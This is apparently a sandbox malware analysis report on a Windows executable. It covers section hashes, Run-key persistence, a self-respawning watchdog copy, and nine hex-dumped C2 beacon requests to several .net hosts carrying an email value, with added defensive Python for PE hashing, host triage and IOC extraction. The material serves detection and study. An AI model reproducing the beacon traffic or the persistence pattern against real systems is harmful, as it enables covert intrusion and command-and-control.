Analysis Date: 2015-05-13 00:34:57

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: c4a2971f6da6fa3e45be3b379cc09482 sha1: 6d2a068f60f65ee4d79dacffc763ac6d3d5f4cff size: 299520
Section .rdata md5: d0eb82adc2a6a47a332583fbfb5ef01f sha1: e6610f4cde5dbf76faa6fe3e49ef1ba8d383b8fb size: 34304
Section (name missing from the report) md5: badb731b7727363c356fb68b22c091d7 sha1: 05250feec4ca5b5a5a7b7e7847e72d1899b50540 size: 102912
Timestamp: 2014-10-30 10:05:52
Packer: Microsoft Visual C++ ?.?
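The per-section md5/sha1/size triples above are hashes over each section's raw file bytes (SizeOfRawData bytes at PointerToRawData), and the Timestamp is the COFF TimeDateStamp decoded as UTC. The following is an added example, not the sandbox's own tooling, that reproduces those values from a PE so a sample on disk can be checked against this report; it assumes the sections are hashed exactly that way, and it builds a constructed, non-runnable PE inline for offline testing (the epoch value 1414663552 is an assumption, chosen because it decodes to the report's Timestamp in UTC; the raw field is not shown above).

```python
import datetime
import hashlib
import struct

# Added example, not part of the report: walk a PE's COFF header and section table,
# hash each section's raw bytes, and decode TimeDateStamp.


def parse_pe(data: bytes) -> dict:
    """Return the COFF machine, UTC timestamp and per-section name/size/md5/sha1."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, tstamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(nsections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        if len(raw) != raw_size:  # truncated or malformed section table
            raise ValueError(f"section {i} points past end of file")
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "size": raw_size,
            "md5": hashlib.md5(raw).hexdigest(),
            "sha1": hashlib.sha1(raw).hexdigest(),
        })
    ts = datetime.datetime.fromtimestamp(tstamp, datetime.timezone.utc)
    return {"machine": machine, "timestamp": ts.strftime("%Y-%m-%d %H:%M:%S"), "sections": sections}


def build_test_pe(sections, timestamp, file_align=0x200) -> bytes:
    """Assemble a minimal, non-runnable PE from (name, bytes) pairs so parse_pe can be
    exercised offline. SizeOfOptionalHeader is 0 here; real images carry one, and
    parse_pe honours whatever size the COFF header declares."""
    n = len(sections)
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, n, timestamp, 0, 0, 0, 0x0102)  # i386, executable
    headers_len = e_lfanew + 4 + 20 + 40 * n
    raw_ptr = -(-headers_len // file_align) * file_align  # round up to file alignment
    table, body, vaddr = b"", b"", 0x1000
    for name, payload in sections:
        padded = payload + b"\0" * (-len(payload) % file_align)
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
        # NumberOfLinenumbers, Characteristics (code|execute|read)
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(payload), vaddr,
                             len(padded), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += padded
        raw_ptr += len(padded)
        vaddr += -(-len(padded) // 0x1000) * 0x1000
    header = dos + b"PE\0\0" + coff + table
    header += b"\0" * (-(-headers_len // file_align) * file_align - len(header))
    return header + body


if __name__ == "__main__":
    # Constructed input: two dummy sections and an assumed epoch for the report's Timestamp.
    sample = build_test_pe([(b".text", b"\x55\x8b\xec" * 100), (b".rdata", b"hello")], 1414663552)
    info = parse_pe(sample)
    print("Timestamp:", info["timestamp"])
    for s in info["sections"]:
        print(f"Section {s['name']} md5: {s['md5']} sha1: {s['sha1']} size: {s['size']}")
```

Run it against a real sample by replacing the constructed PE with `open(path, "rb").read()`; a section whose size or hashes differ from the report means a different build, a patched copy, or a sandbox that hashes a different byte range.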

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Mapper Copy Multimedia Keying Portable Security ➝
C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe

↳ C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\xmlxswi.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.lor
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe"
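Two things in the trace above are worth turning into checks: the Run value that autostarts an executable from a generated-looking directory under Application Data, and the copy re-launching itself with the non-path token WATCHDOGPROC as argv[0] (the \Device\Afd\Endpoint handle opened by that copy is a Winsock socket, so it is the one that talks to the network). The following is an added example, not from the report or the sample: host-triage heuristics over constructed records modelled on the trace. The "Updater" Run value is a made-up benign control, and the thresholds in looks_generated are illustrative rather than tuned.

```python
import re

# Added example, not part of the report. Records are constructed from the trace above;
# the second Run value is an invented benign entry so the heuristics have a negative case.
RUN_VALUES = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Mapper Copy Multimedia Keying Portable Security",
     r"C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     r"C:\Program Files\Vendor\Updater\updater.exe"),
]
PROCESSES = [  # (pid, ppid, image, command line); pids are invented
    (100, 1, r"C:\malware.exe", r"C:\malware.exe"),
    (101, 100,
     r"C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe",
     r"C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe"),
    (102, 101,
     r"C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe",
     r'WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe"'),
]

USER_DATA_DIRS = re.compile(r"\\(Application Data|AppData\\(Roaming|Local)|Local Settings)\\", re.I)
VOWELS = set("aeiou")


def looks_generated(name: str) -> bool:
    """True for long all-lowercase names with almost no vowels; English text runs
    near 38% vowels, so 20% is a loose, illustrative cut-off."""
    if not re.fullmatch(r"[a-z]{8,}", name):
        return False
    return sum(c in VOWELS for c in name) / len(name) < 0.2


def triage_run_value(value_path: str, data: str) -> list:
    """Reasons an autorun entry deserves a look; an empty list means nothing matched."""
    target = data.strip('"')
    parts = target.split("\\")
    exe, parent = parts[-1], (parts[-2] if len(parts) > 1 else "")
    reasons = []
    if USER_DATA_DIRS.search(target):
        reasons.append("autorun from per-user data directory")
    if looks_generated(parent) or looks_generated(exe.rsplit(".", 1)[0]):
        reasons.append("generated-looking path component")
    return reasons


def argv0_of(cmdline: str, image: str) -> str:
    """First command-line token, honouring quotes and unquoted paths that contain spaces."""
    if cmdline.startswith('"'):
        return cmdline[1:].split('"', 1)[0]
    if cmdline.lower().startswith(image.lower()):
        return image
    return cmdline.split(" ", 1)[0]


def triage_processes(procs: list) -> list:
    """Flag children whose argv[0] is not their own image path and whose parent runs
    the same binary, the self-spawned watchdog pattern in the trace."""
    by_pid = {p[0]: p for p in procs}
    alerts = []
    for pid, ppid, image, cmdline in procs:
        argv0 = argv0_of(cmdline, image)
        parent = by_pid.get(ppid)
        same_binary_parent = parent is not None and parent[2].lower() == image.lower()
        if argv0.lower() != image.lower() and same_binary_parent:
            alerts.append((pid, f"argv[0] {argv0!r} differs from image; self-spawned child"))
    return alerts


def triage(run_values, procs) -> list:
    alerts = [(v, r) for v, d in run_values if (r := triage_run_value(v, d))]
    return alerts + triage_processes(procs)


if __name__ == "__main__":
    for alert in triage(RUN_VALUES, PROCESSES):
        print(alert)
```

On a live host the same logic runs over Sysmon event IDs 13 (registry value set) and 1 (process create), or over a registry dump and process list collected during response; the vowel-ratio test is deliberately crude and should be paired with the directory check rather than used alone.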

Network Details:
DNS: 87 queries, all Type: A (the queried names did not survive extraction)
Flows: TCP 192.168.1.1:1031 through 192.168.1.1:1039 ➝ (nine outbound connections, one per source port; destination endpoints did not survive extraction)

Raw Pcap (nine HTTP/1.0 GET requests, identical apart from the Host header; decoded request line: GET /index.php?email=snibsmurdor@vodafoneemail.co.uk&method=post&len HTTP/1.0, with Accept and Connection headers and no User-Agent)
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374   o.uk&method=post
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20666c69 65726265 666f7265   ost: flierbefore
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374   o.uk&method=post
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 206e6967 68747370 72696e67   ost: nightspring
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374   o.uk&method=post
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20636170 7461696e 73756363   ost: captainsucc
0x00000080 (00128)   6573732e 6e65740d 0a0d0a              ess.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374   o.uk&method=post
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20656c65 63747269 63737072   ost: electricspr
0x00000080 (00128)   696e672e 6e65740d 0a0d0a              ing.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374   o.uk&method=post
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20747261 64657370 72696e67   ost: tradespring
0x00000080 (00128)   2e6e6574 0d0a0d0a 0a0d0a              .net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374   o.uk&method=post
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20737472 65657473 75636365   ost: streetsucce
0x00000080 (00128)   73732e6e 65740d0a 0d0a0a              ss.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374   o.uk&method=post
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20737472 65657462 616e6b65   ost: streetbanke
0x00000080 (00128)   722e6e65 740d0a0d 0a0a0a              r.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374   o.uk&method=post
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20626574 74657273 75636365   ost: bettersucce
0x00000080 (00128)   73732e6e 65740d0a 0d0a0a              ss.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374   o.uk&method=post
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20717569 65747375 63636573   ost: quietsucces
0x00000080 (00128)   732e6e65 740d0a0d 0a0a0a              s.net......
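The dumps above are the only record of the C2 traffic, and some of their lines lost the ASCII column, so the reliable way to read them is to rebuild the bytes from the hex. The following is an added example, not part of the report: a decoder for this dump format, a small HTTP request parser, an indicator extractor, and a check for the beacon shape seen here (HTTP/1.0 GET of /index.php with email= and method=post, a value-less len parameter, and no User-Agent). The two embedded dumps are copied from the capture above; the browser-style request in the test is constructed. The parameter names are specific to this capture; the absent User-Agent and the HTTP/1.0 version are the parts more likely to survive a rebuild of the sample.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not part of the report: decode sandbox hex dumps, parse the HTTP
# request they contain, pull out indicators, and match the beacon shape above.

HEXLINE = re.compile(r"^0x([0-9a-fA-F]{8})\s+\(\d+\)\s+(.*)$")


def decode_hexdump(text: str) -> bytes:
    """Concatenate the hex groups of each dump line, checking offsets are contiguous.
    At most four 8-digit groups precede the ASCII column, and the first non-hex token
    ends the hex region; the ASCII column is never trusted because the capture above
    drops it on some lines. A short final line whose ASCII text happens to be a
    hex-looking word would be misread, which the offset check cannot catch."""
    out = bytearray()
    for line in text.splitlines():
        m = HEXLINE.match(line.strip())
        if not m:
            continue
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"non-contiguous dump at offset 0x{m.group(1)}")
        groups = 0
        for tok in m.group(2).split():
            if groups == 4 or len(tok) % 2 or not re.fullmatch(r"[0-9a-fA-F]{2,8}", tok):
                break
            out += bytes.fromhex(tok)
            groups += 1
    return bytes(out)


def parse_http_request(raw: bytes) -> dict:
    """Split a raw request into method, path, version, query parameters and headers."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path, "version": version,
            "query": parse_qs(url.query, keep_blank_values=True),  # keeps the bare "len"
            "headers": headers, "body": body}


def looks_like_beacon(req: dict) -> bool:
    """Shape of the requests in the capture above; see the caveat in the lead-in."""
    q = req["query"]
    return (req["method"] == "GET" and req["version"] == "HTTP/1.0"
            and req["path"] == "/index.php"
            and "email" in q and q.get("method") == ["post"] and q.get("len") == [""]
            and "user-agent" not in req["headers"])


def extract_iocs(dumps) -> dict:
    """Hosts contacted and the email identifier sent, from dumps that match the beacon."""
    hosts, emails = set(), set()
    for dump in dumps:
        req = parse_http_request(decode_hexdump(dump))
        if looks_like_beacon(req):
            hosts.add(req["headers"].get("host", ""))
            emails.update(req["query"]["email"])
    return {"hosts": sorted(hosts), "emails": sorted(emails)}


# Two dumps copied from the capture above (the 0x30 lines lack the ASCII column there).
SAMPLE_DUMPS = [
"""0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20666c69 65726265 666f7265   ost: flierbefore
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....""",
"""0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20636170 7461696e 73756363   ost: captainsucc
0x00000080 (00128)   6573732e 6e65740d 0a0d0a""",
]

if __name__ == "__main__":
    print(extract_iocs(SAMPLE_DUMPS))
```

Feeding all nine dumps through extract_iocs yields the full Host list for blocking or retro-hunting in proxy logs, and looks_like_beacon is the logic to port into a proxy-log query or an IDS rule, where the HTTP/1.0 version combined with a missing User-Agent is the cheaper first-pass filter.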

Strings:
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'